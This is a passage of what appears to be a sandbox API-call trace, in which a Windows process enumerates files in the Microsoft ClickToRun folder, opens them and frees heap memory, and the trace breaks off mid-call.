AreFileApisANSI () returned 1 [0078.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0078.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x84fe0 [0078.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0078.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.526] GetFileType (hFile=0x430) returned 0x1 [0078.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0078.527] CloseHandle (hObject=0x430) returned 1 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0078.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.528] AreFileApisANSI () returned 1 [0078.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0078.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x851c0 [0078.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0078.528] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb3841600, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4b8)) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0078.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0078.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.529] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x514a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0078.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0078.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.529] AreFileApisANSI () returned 1 [0078.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll", lpUsedDefaultChar=0x0) returned 72 [0078.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0078.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0078.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0078.530] AreFileApisANSI () returned 1 [0078.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0078.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0078.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0078.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.531] GetFileType (hFile=0x430) returned 0x1 [0078.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0078.531] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0078.531] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0078.531] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0078.531] CloseHandle (hObject=0x430) returned 1 [0078.531] AreFileApisANSI () returned 1 [0078.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0078.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0078.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.532] GetFileType (hFile=0x430) returned 0x1 [0078.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0078.532] CloseHandle (hObject=0x430) returned 1 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0078.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.534] AreFileApisANSI () returned 1 [0078.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0078.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0078.534] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x514a8)) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0078.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.534] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd783a00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="i640.hash", cAlternateFileName="I640~1.HAS")) returned 1 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0078.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0078.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0078.535] HeapFree (in: 